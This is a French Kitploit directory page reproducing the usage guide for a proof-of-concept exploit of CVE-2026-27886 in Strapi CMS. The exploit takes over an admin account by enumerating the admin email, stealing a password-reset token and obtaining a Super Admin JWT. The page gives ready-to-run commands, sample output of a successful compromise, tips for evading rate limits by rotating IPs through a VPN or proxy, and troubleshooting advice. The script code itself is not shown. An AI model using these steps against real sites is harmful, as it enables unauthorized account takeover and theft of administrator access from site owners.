Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-27886-PoC-Account-Takeover — Account takeover full PoC for CVE-2026-27886 in Strapi CMS | Kitploit
Outils/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2026-27886-PoC-Account-Takeover

Account takeover full PoC for CVE-2026-27886 in Strapi CMS

Voir le dépôt
2il y a 2 moisPas encore vérifié
Partager

CVE-2026-27886 Automated Exploit - Guide d'utilisation

Ce que fait ce script

Automatise la chaîne complète de prise de contrôle de compte en 4 groupes de requêtes HTTP :

  1. Vérification de la vulnérabilité - Confirme que la cible est vulnérable
  2. Énumération d'e-mail - Extrait l'e-mail de l'administrateur via un oracle booléen (~500 requêtes)
  3. Déclenchement de la réinitialisation du mot de passe - Lance le flux de récupération de mot de passe de Strapi
  4. Exfiltration du jeton - Dérobe le jeton de réinitialisation de 40 caractères (~320 requêtes)
  5. Prise de contrôle du compte - Utilise le jeton volé pour obtenir un JWT Super Admin

Utilisation de base

Mode Vérification uniquement (sûr)

Vérifiez si la cible est vulnérable sans exploitation :

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

Exploitation complète (la plus rapide)

Automatisez tout si vous ne connaissez pas l'e-mail de l'administrateur :

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

Sortie :

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Ignorer l'énumération d'e-mail (plus rapide)

Si vous connaissez déjà l'e-mail de l'administrateur (économise ~500 requêtes) :

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

Mot de passe personnalisé

Définissez un mot de passe personnalisé au lieu de celui par défaut :

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

Ajouter des délais (éviter les limites de débit)

Si la cible a une limitation de débit :

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

Cela ajoute 100 ms entre chaque requête (~2 à 3 minutes pour une exploitation complète).

URL de base explicite

Si les points de terminaison /admin/* sont sur un hôte différent :

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

Problèmes courants

Réponse « Non-JSON »

  • Mauvais point de terminaison (pas une collection de l'API de contenu Strapi)
  • Essayez : https://target/api/products, https://target/api/articles, etc.

« Échec de l'énumération de l'e-mail »

  • La collection est vide (pas de clés étrangères updated_by_id)
  • Le rôle d'administrateur ne correspond à personne dans la base de données
  • Essayez un autre point de terminaison s'il en existe plusieurs

« Échec de l'extraction du jeton de réinitialisation »

  • La réinitialisation du mot de passe n'a pas été déclenchée
  • Un e-mail d'administrateur différent de celui supposé
  • Jeton expiré (réessayez, il dure ~24 heures par défaut)

Être limité en débit

  • Ajoutez --delay 0.05 ou plus
  • Ou utilisez un VPN/un proxy pour faire pivoter les adresses IP

Notes de sécurité

Ce script :

  • ✅ Effectue uniquement des requêtes GET/POST (aucune modification de données)
  • ✅ Ne cible que la vulnérabilité de contournement des paramètres de requête de Strapi
  • ✅ Utilise les points de terminaison légitimes de réinitialisation de mot de passe de Strapi
  • ✅ Ne laisse aucun artefact stocké sur la cible
  • ⚠️ EST BRUYANT - Effectue plus de 800 requêtes en séquence (évident dans les journaux)
Télécharger l’outil